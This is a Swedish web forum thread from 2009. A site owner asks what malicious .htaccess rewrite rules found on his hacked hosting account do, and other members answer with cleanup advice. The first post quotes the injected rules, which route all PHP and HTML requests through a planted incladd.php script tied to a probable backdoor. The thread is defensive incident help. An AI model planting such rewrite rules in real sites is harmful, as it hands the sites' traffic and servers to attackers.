Kom ihåg mig?

Hacking av mitt webbkonto

Ämnesverktyg Visningsalternativ
Oläst 2009-04-02, 14:08 #1
vidirs avatar
vidir vidir är inte uppkopplad
Medlem
 
Reg.datum: Jan 2004
Inlägg: 291
vidir vidir är inte uppkopplad
Medlem
vidirs avatar
 
Reg.datum: Jan 2004
Inlägg: 291
Hej!

jag fick nyligen ett av mina webbkonto hackade:

Jag hittade detta i min .htaccess:

RewriteCond /home/mittkonto/public_html/minkatalog/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !16e414.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /minkatalog/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING } [NC,L]
RewriteCond %{REQUEST_URI} !148dea.php$

känner ni till vad detta gör?


<_<
vidir är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-04-02, 15:29 #2
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Kolla vad filen "incladd.php" & "16e414.php" gör.

16e414.php är troligen en bakdörr för att få kontroll över servern.

En sökning på Google gav informationen om att det rör hål i Coppermine & Joomla!

Töm din .htaccess & radera filerna.

Uppdatera all mjukvara du har på ditt konto till det senaste.
Jonas är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-04-02, 15:50 #3
vidirs avatar
vidir vidir är inte uppkopplad
Medlem
 
Reg.datum: Jan 2004
Inlägg: 291
vidir vidir är inte uppkopplad
Medlem
vidirs avatar
 
Reg.datum: Jan 2004
Inlägg: 291
tack,, skulle sparat filerna först,, men jag raderade dom direkt ;-)

har dock inte jomla eller coppermine installerat..
vidir är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-04-02, 16:10 #4
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Jonas Jonas är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Feb 2004
Inlägg: 3 364
Okej, har du WordPress då?

Eftersom söker man på "incladd.php" så dyker det upp resultat från Coppermine, Joomla! & Wordpress sidor främst.

Men alla är eniga, radera filerna & ta bort raderna i .htaccess.
Jonas är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-04-02, 18:02 #5
hnn hnn är inte uppkopplad
Banned
 
Reg.datum: Mar 2004
Inlägg: 2 587
hnn hnn är inte uppkopplad
Banned
 
Reg.datum: Mar 2004
Inlägg: 2 587
Byt lösenord i på ditt konto och kontrollera dina loggar efter dom filerna.
hnn är inte uppkopplad   Svara med citatSvara med citat
Oläst 2009-04-02, 18:31 #6
tartareandesire tartareandesire är inte uppkopplad
Supermoderator
 
Reg.datum: Jan 2004
Inlägg: 11 585
tartareandesire tartareandesire är inte uppkopplad
Supermoderator
 
Reg.datum: Jan 2004
Inlägg: 11 585
Det finns ju också en möjlighet att de kommit åt kontot på andra vägar än genom Wordpress eller Joomla. I så fall är det allvarligare.
__________________
Full-stack developer, free for smaller assignments
tartareandesire är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 
Ämnesverktyg
Visningsalternativ

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 01:19.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017